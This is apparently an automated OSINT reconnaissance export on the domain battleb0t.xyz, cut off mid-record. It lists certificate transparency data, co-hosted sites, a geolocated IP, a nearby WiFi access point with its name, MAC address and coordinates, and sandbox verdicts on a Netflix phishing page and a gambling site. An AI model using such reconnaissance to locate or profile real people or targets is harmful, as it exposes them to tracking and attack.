RSA Public-Key: (4096 bit)
Modulus:
00:c5:26:42:72:54:54:74:21:1e:c0:7a:66:54:5a:
e8:26:8a:a7:bb:78:e0:52:09:b4:70:cd:bc:21:4b:
2c:77:39:63:f4:67:8f:19:31:3e:f0:0f:58:55:9d:
80:0d:29:74:7f:66:1f:df:6c:0f:e4:7c:f2:b1:63:
d3:73:4b:d0:8e:1c:94:d5:39:9f:87:08:c9:39:28:
06:18:ff:8b:b4:c8:13:46:ac:cf:6d:a5:8c:43:a0:
09:d6:74:e4:1b:e6:a1:90:6d:22:b3:ba:58:9d:f7:
79:37:55:b1:58:ef:15:cb:64:d0:30:b0:3c:9c:57:
0f:fe:6c:6b:bb:3f:27:84:33:78:b0:19:92:bf:97:
a6:0f:20:d5:97:af:a6:3b:9d:2c:b6:18:1b:80:b6:
fb:2e:b9:e7:44:40:3a:ab:de:d1:27:94:5c:98:f3:
69:c6:eb:0a:ba:59:dd:58:0a:8d:f7:6b:71:2d:96:
80:0b:9a:05:20:72:48:c7:59:11:c0:d5:98:a3:64:
8a:78:35:12:8b:20:64:de:10:73:21:62:d5:82:94:
42:92:41:f0:40:98:0d:fd:64:08:ef:ba:99:48:1d:
ae:86:bd:de:46:1e:c7:72:49:3d:93:76:b8:e9:ff:
0d:e2:5c:31:61:a9:f2:59:1c:92:cb:56:9f:9b:f7:
48:28:35:ef:e1:4f:ae:4c:d6:6f:39:80:a0:50:ab:
78:66:96:ff:8d:78:93:50:2d:b7:0a:ef:fe:70:44:
cf:d9:e4:4f:5e:34:97:d6:93:af:d9:54:30:40:86:
24:9c:59:46:7c:df:86:e9:5e:eb:17:7f:95:e4:0e:
70:f5:5a:35:d4:64:cb:b9:5b:5c:bb:45:e6:4e:80:
a3:6d:83:42:86:a4:44:3b:83:c2:1d:e2:02:99:d0:
36:4c:c3:91:eb:69:38:a7:7d:2f:35:65:33:3e:23:
0b:5d:1b:0c:01:a1:10:75:e2:ac:bb:3b:bf:f6:2f:
ec:4e:98:ec:53:ee:86:34:4c:69:d1:38:5c:a9:07:
72:79:62:64:81:ea:03:fc:2f:18:db:04:b6:04:36:
1d:bc:01:56:0e:d9:49:1c:dd:41:11:ce:34:13:0f:
13:81:d8:cd:71:a3:fc:76:2b:ea:14:1c:8d:38:63:
54:f1:73:9f:26:18:47:68:79:40:b9:a0:ac:b7:d2:
e0:a8:36:94:6f:0c:c3:56:34:6a:ee:a7:97:c4:d3:
0b:44:a3:56:87:d8:dc:ce:f3:89:8c:09:62:1a:25:
1f:dd:5f:2a:c0:d4:a9:14:4f:34:09:bc:53:d5:35:
be:6b:0d:6a:49:bf:0b:11:66:23:11:60:25:c5:db:
56:15:5d
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:E8:B3:AA:B6:B4:6A:08:8C:66:4E:1B:FC:F4:D4:C0:C8:AD:D7:A5
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 13 16:44:09.315 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:EB:B2:4A:B8:57:10:D6:3B:2F:B5:2A:
89:BA:32:85:1C:16:28:E8:45:62:3E:AC:5F:C1:A7:01:
D5:8E:30:E3:17:02:20:27:39:6A:04:D2:61:CC:BD:8C:
4F:C5:13:6E:02:18:EB:24:BE:73:9E:F1:B4:F7:D8:89:
3A:CF:69:2B:AA:1C:75
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Dec 13 16:44:09.312 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:73:42:08:21:4C:2B:6E:54:89:A5:9F:6C:
27:A0:E3:7D:5D:89:06:32:EB:1E:21:D3:16:0C:E5:9D:
AB:38:FC:69:02:20:6E:F0:01:D9:C1:A2:AD:6E:65:26:
28:CF:30:5D:77:85:32:E7:53:E7:81:77:F5:0B:21:74:
83:B6:A0:E7:EA:52
Signature Algorithm: sha256WithRSAEncryption
32:8d:f0:fd:98:aa:6b:67:8b:fd:50:1f:a3:82:12:f7:96:0e:
20:1c:fd:bd:65:b3:76:ea:7d:e7:8e:de:49:56:5d:75:39:27:
85:12:91:b5:c9:aa:a8:98:14:b1:0b:89:0c:69:e2:0c:9e:47:
2e:8e:21:a5:d8:33:ba:43:8f:1a:0f:2c:6a:f9:b8:67:f2:5f:
5c:7a:06:bd:b7:ef:55:c1:6f:51:6b:fa:6b:09:ef:8b:fb:80:
49:8f:ee:cc:90:25:a6:9f:27:ae:ce:25:a8:cb:20:f2:07:c4:
43:8f:46:e1:64:24:94:30:c9:cf:5b:53:42:96:1a:a8:a3:26:
9e:e0:4f:a8:90:5b:82:db:4d:1c:ca:70:31:76:0c:bb:6c:d1:
c9:02:ca:92:68:04:3a:5e:ff:d1:9c:cc:9d:29:99:f7:9f:50:
63:8c:bd:09:15:13:aa:10:8a:fe:a4:7b:38:d1:de:50:78:a9:
f5:b9:42:b6:a4:a3:92:70:93:b5:82:12:31:84:1f:7a:4e:c1:
b5:6e:db:bb:40:e0:59:4d:30:89:d2:e6:e9:ce:d5:19:06:a3:
10:65:96:34:86:38:78:b2:8f:41:76:5c:48:0c:dd:1e:50:46:
64:18:01:03:0a:cf:fb:4b:6e:47:08:59:20:26:e3:b6:52:18:
5b:fb:b5:4a
|
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/ein_1.png | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00d2.github.io | 185.199.111.153 |
| 2023-05-12 02:46:04 | Physical Location | No | AbstractAPI | 0 | 0 | 3 | 0 | None | North Charleston, South Carolina, 29415, United States, North America | 34.74.170.74 |
| 2023-05-12 02:44:29 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:10:8b:16:97:4c:80:e7:56:d7:06:74:1e:45:16:d2:cf:08
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 18 13:27:58 2022 GMT
Not After : Mar 18 13:27:57 2023 GMT
Subject: CN=panel.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:ad:62:80:b3:4a:16:3f:d1:ca:02:76:24:cc:9e:
aa:84:81:39:ce:32:30:eb:2b:8e:c4:10:85:04:e9:
19:e1:2c:8b:f7:58:3e:cb:1c:ff:b5:a4:5e:3a:d3:
5f:cd:9f:7e:93:67:29:42:61:bd:af:c4:d3:ff:2c:
ba:88:7a:06:b8:ee:d1:0b:bb:86:7e:44:8f:c8:6e:
9f:15:1a:80:a4:23:08:22:e4:47:13:58:3b:f2:14:
1e:d6:ab:b0:0d:9a:3d:43:fa:19:c7:62:73:68:d3:
e8:e2:e0:f2:f8:19:08:fa:27:87:9f:f6:00:ca:15:
68:32:25:1a:17:ab:c2:10:cf:ee:c4:5c:e1:5a:4c:
7f:24:75:c4:d7:a8:bb:65:e9:41:ed:b3:2d:c0:d3:
43:15:31:0d:92:7c:15:d2:74:91:60:11:b3:a9:c4:
23:1e:bd:9f:cd:65:52:70:48:15:e3:b8:f4:be:c0:
7b:19:6d:7b:06:84:b9:fd:58:0b:97:47:76:a2:75:
8a:02:5c:f4:a0:74:5a:14:c3:00:00:11:33:ca:09:
cb:4f:f9:83:06:46:d2:9c:09:dd:c0:9e:5b:21:5b:
9d:26:54:f2:ef:8a:39:ff:fb:2e:d5:3b:31:32:7d:
8d:f4:d5:b5:c2:47:2c:44:11:4c:77:93:b1:be:73:
3c:fd:f8:ad:ee:38:c8:cc:7c:fd:93:89:87:7c:f1:
ff:7e:d9:02:fc:16:a4:8b:6d:44:ce:9d:18:99:9a:
80:ce:7f:84:4a:5f:f2:64:78:f3:c5:e5:c6:c7:66:
3e:15:14:9a:10:d3:79:7b:53:46:72:6c:1d:43:1a:
b1:35:e5:15:1e:25:f5:a3:42:b9:f7:c3:cc:11:45:
0d:91:92:d0:7c:af:f5:38:d6:f6:5b:a6:85:e8:1b:
87:47:00:ae:a6:0b:b0:8b:45:d2:80:d3:a6:4d:e2:
fe:d5:6d:a5:c3:c6:cb:5d:f4:1c:79:c6:67:7f:4c:
cd:e5:9e:5e:f5:60:0e:99:47:13:b5:ed:4f:e1:0e:
26:01:e6:84:00:6a:80:a9:fd:0c:5d:16:61:ba:be:
ee:5f:41:8c:41:20:95:45:47:52:41:85:d1:cc:b2:
ba:00:26:e3:48:1b:65:5b:e0:7a:f5:04:7c:c4:32:
1f:ac:c5:99:05:ef:49:b1:5a:de:e3:c4:60:e2:03:
33:84:8a:7a:ad:eb:d2:0c:0c:ff:c4:c2:64:33:29:
15:c7:0a:73:e3:0f:ee:4a:08:a2:6b:f1:e4:95:67:
2f:52:99:fd:3e:6c:01:2d:31:33:10:f6:db:5c:20:
7c:3b:ba:79:4b:c3:c0:d7:a8:e3:f0:e3:c9:f6:e5:
3c:bf:e5
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
A8:1A:0A:B4:5A:C9:CB:04:98:CA:A0:D2:67:45:9B:9C:A4:98:23:12
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:panel.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 18 14:27:58.330 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:5D:91:A5:EC:4A:FC:74:A1:CB:A1:43:42:
98:62:F0:F5:48:D8:59:AD:3A:BF:07:84:B7:A0:B8:FB:
F5:7F:02:9D:02:20:12:51:01:88:30:77:0C:12:2D:94:
E1:FC:28:63:C7:64:51:4C:7A:14:F6:58:60:D3:18:55:
AA:0B:5F:BF:83:CC
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Dec 18 14:27:58.947 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:D5:B1:CF:FB:EB:66:58:C1:7C:1F:B7:
27:25:02:E3:9E:12:C4:74:28:D8:27:C6:B7:CB:84:D4:
7D:B7:00:1E:10:02:20:0C:56:3E:2A:0C:E4:D2:75:F2:
E0:99:5F:A7:32:B4:86:4A:7F:09:D3:E9:8B:5E:F2:A9:
78:DC:08:7A:AD:C8:9D
Signature Algorithm: sha256WithRSAEncryption
56:f1:41:e3:6f:ab:da:37:be:d4:6d:55:43:59:14:33:ac:42:
61:99:54:b2:cc:68:3b:12:68:7c:14:63:9a:e3:c7:2d:28:07:
ac:4e:8c:b4:88:4d:80:ce:91:c9:a5:4d:dd:f1:2e:8e:58:cd:
80:0c:46:fa:23:e4:c8:e8:14:61:72:93:e1:44:e8:c3:77:c0:
aa:ee:7c:6f:ea:e8:70:f4:d2:e3:e8:1b:8a:39:ca:f5:73:f4:
96:02:3b:a3:36:c0:cb:29:b2:45:5f:f0:82:fc:84:4a:6e:b5:
8b:1c:4a:0e:46:1e:66:a9:10:39:d1:75:3c:a8:c4:57:7f:9f:
62:b2:b2:a2:ec:e6:f3:84:e9:0c:f9:be:3e:3f:3f:98:a2:49:
b7:f8:ec:62:7a:a6:69:6f:94:d9:c6:a1:e0:cd:b8:20:3a:ae:
44:80:7f:ac:d9:a3:54:24:56:5d:f1:bf:01:6e:fe:df:0c:62:
2d:77:e4:5c:18:4d:90:25:51:13:68:40:ac:f8:0c:fc:86:c6:
34:50:55:8e:da:35:b1:44:f3:0d:df:99:4c:2f:5a:3f:d4:52:
8d:52:80:94:14:ff:5b:30:58:13:05:5b:9a:df:d5:d4:32:40:
69:ff:dd:82:79:46:62:09:c8:ab:58:69:3f:2e:57:89:60:f9:
31:9d:86:6b
| battleb0t.xyz |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | angelique (Net ID: 00:0B:6C:C7:12:D8) | 39.0469, -77.4903 |
| 2023-05-12 02:45:36 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://nabarun101.github.io/mynetflix', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://nabarun101.github.io/Mynetflix/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_e04_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_e04_IESQMMUTEX_0_519"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_e04_IE_EarlyTabStart_0x894_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3588"\n "IsoScope_e04_IESQMMUTEX_0_331"\n "IsoScope_e04_ConnHashTable<3588>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_e04_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:80"\n "185.199.111.153:443"\n "104.18.22.52:443"\n "172.64.101.10:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"nabarun101.github.io"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ka-f.fontawesome.com"\n "kit.fontawesome.com"\n "nabarun101.github.io"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<p class="text-dark">Watch right on Netflix.com</p>" (Indicator: "dir "; File: "Mynetflix_2_.htm")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced" and extension "png"\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "free-fa-solid-900_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Free Solid family"- [targetUID: N/A]\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "free.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "free-fa-regular-400_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Free Regular family"- [targetUID: N/A]\n "free-v4-shims.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003588]\n "~DFFA2460BF0619E6A5.TMP" has type "data"- Location: [%TEMP%\\~DFFA2460BF0619E6A5.TMP]- [targetUID: 00000000-00003588]\n "~DF3C66DECFD1719D57.TMP" has type "data"- Location: [%TEMP%\\~DF3C66DECFD1719D57.TMP]- [targetUID: 00000000-00003588]\n "~DF11E03E1F26AC0C90.TMP" has type "data"- Location: [%TEMP%\\~DF11E03E1F26AC0C90.TMP]- [targetUID: 00000000-00003588]\n "urlref_httpnabarun101.github.ioMynetflix" has type "HTML document ASCII text with CRLF line terminators"- [targetUID: N/A]\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "style_1_.css" has type "assembler source ASCII text with CRLF line terminators"- [targetUID: N/A]\n "RecoveryStore._B3D1C4BF-E888-11ED-8ED0-08002750FF42_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_BBFF638A-E888-11ED-8ED0-08002750FF42_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_B3D1C4C1-E888-11ED-8ED0-08002750FF42_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-62', u'name': u'Communicates with HTTP webserver (GET/POST requests)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Found http requests in header "GET /Mynetflix/"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://nabarun101.github.io/Mynetflix/"\n Pattern match: "http://nabarun101.github.io"\n Pattern match: "http://nabarun101.github.io/Mynetflix"\n Pattern match: "MUID089815D4E5BB620D23EC06D1E43F63D8msn.com/102523667231108893306123338431030421*"\n Pattern match: "SUIDMmicrosoft.com/9216415271475231030538305717088431030421*MUID3E7917FF718064A210F604FA700465BDmicrosoft.com/1025428520396831108892305732713431030421*_EDGE_V1microsoft.com/9216428520396831108892305732713431030421*SRCHDAF=NOFORMmicrosoft.com/10243323789440"\n Pattern match: "https://fontawesome.com"\n Pattern match: "https://fontawesome.com/license/free"\n Pattern match: "SUIDMmicrosoft.com/9216415271475231030538305717088431030421*MUID3E7917FF718064A210F604FA700465BDmicrosoft.com/1025428520396831108892305732713431030421*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA6"\n Pattern match: "https://kit.fontawesome.com/d83bab02e7.js"\n Pattern match: "MUIDB3E7917FF718064A210F604FA700465BDieonline.microsoft.com/9216428520396831108892305732713431030421*"\n Pattern match: "isdomainmigratedtruewww.msn.com/102589365619231066648306107713431030421*"\n Pattern match: "www.msn.com/"\n Pattern match: "SUIDMmicrosoft.com/9216415271475231030538305717088431030421*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743*SRCHUSRDOB=202201"\n Heuristic match: "nabarun101.github.io"\n Heuristic match: "ka-f.fontawesome.com"\n Heuristic match: "kit.fontawesome.com"\n Pattern match: "https://nabarun101.github.io/Mynetflix/Accept-Language"\n Heuristic match: "GET /Mynetflix/ HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateDNT: 1Connection: Keep-AliveHost: nabarun101.github.io"\n Pattern match: "http://www.w3.org/1999/02/22-rdf-syntax-ns#"'}, {u'category' | 185.199.111.153 |
| 2023-05-12 02:54:29 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://rebrand.ly/altbdsakong', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://rebrand.ly/altbdsakong', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://rebrand.ly/promobdsakong', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'http://sakong88.cfd/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_3f0_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_3f0_IESQMMUTEX_0_303"\n "IsoScope_3f0_IESQMMUTEX_0_519"\n "IsoScope_3f0_ConnHashTable<1008>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_3f0_IE_EarlyTabStart_0xdc0_Mutex"\n "IsoScope_3f0_IESQMMUTEX_0_331"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1008"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1008"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.21.62.177:80"\n "104.21.62.177:443"\n "172.217.12.104:443"\n "104.17.25.14:443"\n "172.67.178.49:443"\n "184.106.10.72:443"\n "142.251.46.174:443"\n "185.199.109.153:443"\n "151.101.24.193:443"\n "142.250.189.234:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"sakong88.cfd"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"100tst.sbs"\n "sakong88.cfd"\n "www.livehelpnow.net"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"transportUrl:b,context:c},J(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+ve.ca+"&cx=c";Fo()&&(f+="&sign="+ve.Td);var g=Ee||Ge?Eo(b,f):void 0;g||(g=ql("https://","http://",ve.kd+f));di().destination[a]={state:1,context:c};Hb(g)}};function Go(){if(Zh()){return!0}return!1};var Jo=new RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/),Ko={cl:["ecl"],customPixels:["nonGooglePixels"],ecl:["cl"],ehl:["hl"],hl:["ehl"],html:["customScripts","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],customScripts:["html","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],nonGooglePixels:[],nonGoogleScripts:["nonGooglePixels"],nonGoogleIframes:["nonGooglePixels"]},Lo={cl:["ecl"],customPixels:["customScripts","html"]," (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n 